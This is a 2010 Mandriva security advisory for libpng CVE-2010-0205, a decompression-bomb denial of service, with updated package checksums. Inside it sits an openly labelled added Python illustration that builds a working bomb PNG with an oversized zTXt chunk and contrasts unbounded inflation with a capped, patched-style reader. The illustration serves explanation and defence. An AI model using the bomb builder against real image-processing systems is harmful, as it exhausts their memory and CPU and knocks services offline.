Message-Id: <E1Nu3fJ-00050h-3O@titan.mandriva.com>
Date: Tue, 23 Mar 2010 13:57:00 +0100
From: security@...driva.com
To: full-disclosure@...ts.grok.org.uk
Subject: [ MDVSA-2010:064 ] libpng


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:064
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libpng
 Date    : March 23, 2010
 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been found and corrected in libpng:
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 The updated packages have been patched to correct this issue.
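The bug class described above, as an added illustration that is not libpng's code or part of this advisory: a PNG whose zTXt chunk carries a deflate stream that inflates roughly 1000:1, parsed once the way the unpatched png_decompress_chunk behaves (inflate everything the stream yields) and once with an output cap of the kind the fixed versions apply. The 8,000,000-byte cap, the chunk layout helpers and the sample file are assumptions of this demo, not taken from the advisory; Python's zlib stands in for the C library only to show the mechanism.

```python
"""CVE-2010-0205 bug class: a compressed ancillary chunk (zTXt) whose inflated
size dwarfs the file.  Added example, not libpng's own code; the 8,000,000
byte cap is an assumed limit for this demo."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
CHUNK_MALLOC_MAX = 8_000_000  # assumed cap on inflated ancillary-chunk size


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_bomb_png(inflated_size: int) -> bytes:
    """Constructed 1x1 greyscale PNG whose zTXt text is `inflated_size` bytes
    of 'A'; deflate shrinks such a run by about 1000:1."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    # zTXt body: keyword, NUL, compression method (0 = deflate), zlib stream
    ztxt = b"Comment\x00\x00" + zlib.compress(b"A" * inflated_size, 9)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one grey pixel
    return (PNG_SIGNATURE + make_chunk(b"IHDR", ihdr) + make_chunk(b"zTXt", ztxt)
            + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) per chunk, checking the signature and each CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos < len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if len(data) != length or zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("truncated or corrupt chunk %r" % ctype)
        yield ctype, data
        pos += 12 + length


def ztxt_stream(data: bytes) -> bytes:
    """Strip the keyword and compression-method byte from a zTXt body."""
    keyword, _, rest = data.partition(b"\x00")
    if not keyword or rest[:1] != b"\x00":
        raise ValueError("bad zTXt chunk")
    return rest[1:]


def inflate_unbounded(stream: bytes) -> int:
    """Unpatched behaviour: inflate whatever the stream yields, however large.
    Returns the byte count actually materialised in memory."""
    return len(zlib.decompress(stream))


def inflate_bounded(stream: bytes, limit: int = CHUNK_MALLOC_MAX) -> bytes:
    """Patched behaviour: stop once more than `limit` bytes would be produced.
    Asking for limit+1 bytes exposes an oversize stream without inflating it."""
    d = zlib.decompressobj()
    out = d.decompress(stream, limit + 1)
    if len(out) > limit or not d.eof:
        raise ValueError("inflated chunk exceeds %d bytes or is truncated" % limit)
    return out


def ztxt_sizes(png: bytes, limit: int = CHUNK_MALLOC_MAX):
    """Return (unbounded_inflated_size, accepted_by_bounded_inflate) for the
    first zTXt chunk in `png`."""
    for ctype, data in iter_chunks(png):
        if ctype == b"zTXt":
            stream = ztxt_stream(data)
            try:
                inflate_bounded(stream, limit)
                accepted = True
            except ValueError:
                accepted = False
            return inflate_unbounded(stream), accepted
    raise ValueError("no zTXt chunk")


if __name__ == "__main__":
    bomb = build_bomb_png(10_000_000)
    print("file size:", len(bomb), "bytes; zTXt inflates to / accepted:",
          ztxt_sizes(bomb))
```

The ratio between the file size printed and the inflated size is what makes this a denial of service rather than a mere large file: a reader that trusts the stream allocates and fills memory proportional to the attacker's choice, while the bounded reader rejects the chunk after producing at most `limit + 1` bytes.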
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 e0f5c5c179b1224d99f6b16b718069b1  2009.0/i586/libpng3-1.2.31-2.2mdv2009.0.i586.rpm
 5e5e6ec06e5d5997d82b1780c6e364e1  2009.0/i586/libpng-devel-1.2.31-2.2mdv2009.0.i586.rpm
 48c2108e471923710e8ac01d7984df3a  2009.0/i586/libpng-source-1.2.31-2.2mdv2009.0.i586.rpm
 24e60615f07e3310091b96db44821b55  2009.0/i586/libpng-static-devel-1.2.31-2.2mdv2009.0.i586.rpm 
 148ad37542ef79c0ed97be519be0478d  2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 0a76c1bbd16c3ff1e23027aeba6dbb70  2009.0/x86_64/lib64png3-1.2.31-2.2mdv2009.0.x86_64.rpm
 8e01630ee7eb85327dc226632b535ffd  2009.0/x86_64/lib64png-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 ed2d30ab62de27e52052fc2bd5958540  2009.0/x86_64/lib64png-static-devel-1.2.31-2.2mdv2009.0.x86_64.rpm
 363e0b340727539dab6765b89660fb43  2009.0/x86_64/libpng-source-1.2.31-2.2mdv2009.0.x86_64.rpm 
 148ad37542ef79c0ed97be519be0478d  2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 eb835d104959137d6ca68071e8f55fc6  2009.1/i586/libpng3-1.2.35-1.1mdv2009.1.i586.rpm
 c0154024cdcfa2d9fb221e2f4483546c  2009.1/i586/libpng-devel-1.2.35-1.1mdv2009.1.i586.rpm
 22ec75a046bd10bfa69afa223e651357  2009.1/i586/libpng-source-1.2.35-1.1mdv2009.1.i586.rpm
 2ddcfacf2b6dfa6bf873ffb49bbec43e  2009.1/i586/libpng-static-devel-1.2.35-1.1mdv2009.1.i586.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 c9eec8bdd1b1a2aea33a9e5f8dfdc05e  2009.1/x86_64/lib64png3-1.2.35-1.1mdv2009.1.x86_64.rpm
 36436b03497287eefe7011cfc4b69ab5  2009.1/x86_64/lib64png-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 810be607e4dcc0c1e6157dd0281b3122  2009.1/x86_64/lib64png-static-devel-1.2.35-1.1mdv2009.1.x86_64.rpm
 948e22de64093275c10dbd781cde02ed  2009.1/x86_64/libpng-source-1.2.35-1.1mdv2009.1.x86_64.rpm 
 d28bd0a3c425381e441c0c1d4202ee3d  2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 50a03f5191cc9383c09ef152fa6ebb8c  2010.0/i586/libpng3-1.2.40-1.1mdv2010.0.i586.rpm
 6a528114a5d5cf86c684a179f5ee36b8  2010.0/i586/libpng-devel-1.2.40-1.1mdv2010.0.i586.rpm
 9a1154491d80af5ced9a02e37947bf2c  2010.0/i586/libpng-source-1.2.40-1.1mdv2010.0.i586.rpm
 fb0671ad70f8202f32c7566d08070a8c  2010.0/i586/libpng-static-devel-1.2.40-1.1mdv2010.0.i586.rpm 
 5911cb03cac15875905c17214463ab65  2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 08e10e44a82ca8df8c6586bf07d3b6ce  2010.0/x86_64/lib64png3-1.2.40-1.1mdv2010.0.x86_64.rpm
 224425aa77a35bd3233c89613562fe7e  2010.0/x86_64/lib64png-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 2682dae8ecdb43af20aadea093d3f03d  2010.0/x86_64/lib64png-static-devel-1.2.40-1.1mdv2010.0.x86_64.rpm
 be6b483916a098489e41d13bf2f98d63  2010.0/x86_64/libpng-source-1.2.40-1.1mdv2010.0.x86_64.rpm 
 5911cb03cac15875905c17214463ab65  2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm

 Mandriva Enterprise Server 5:
 cb7196e7825b553e2414b76e236abf36  mes5/i586/libpng3-1.2.31-2.2mdvmes5.i586.rpm
 909211c1ac708b89b790e75261ac27b4  mes5/i586/libpng-devel-1.2.31-2.2mdvmes5.i586.rpm
 5216e2e783fee0043ccf34c84db096fd  mes5/i586/libpng-source-1.2.31-2.2mdvmes5.i586.rpm
 321d36768502ddfb1b90086b6204a670  mes5/i586/libpng-static-devel-1.2.31-2.2mdvmes5.i586.rpm 
 b2e5c72d1cc33ec0e53b36a590cafa35  mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 457da1eac0895ee795e2076d46e723d6  mes5/x86_64/lib64png3-1.2.31-2.2mdvmes5.x86_64.rpm
 80a132428cc6638972263f7f92fef9da  mes5/x86_64/lib64png-devel-1.2.31-2.2mdvmes5.x86_64.rpm
 34bea6af1ef00ce04c3f842e6b5fc112  mes5/x86_64/lib64png-static-devel-1.2.31-2.2mdvmes5.x86_64.rpm
 a89184a0f83c9bc3b295909a174e66d1  mes5/x86_64/libpng-source-1.2.31-2.2mdvmes5.x86_64.rpm 
 b2e5c72d1cc33ec0e53b36a590cafa35  mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLqIx9mqjQ0CJFipgRAjwEAJ9esE4PRdBb1EyE3TaH1wOwo+7isgCgoj4l
HzHGWDCDi+o3C9YelfNCJ8s=
=l5qb
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
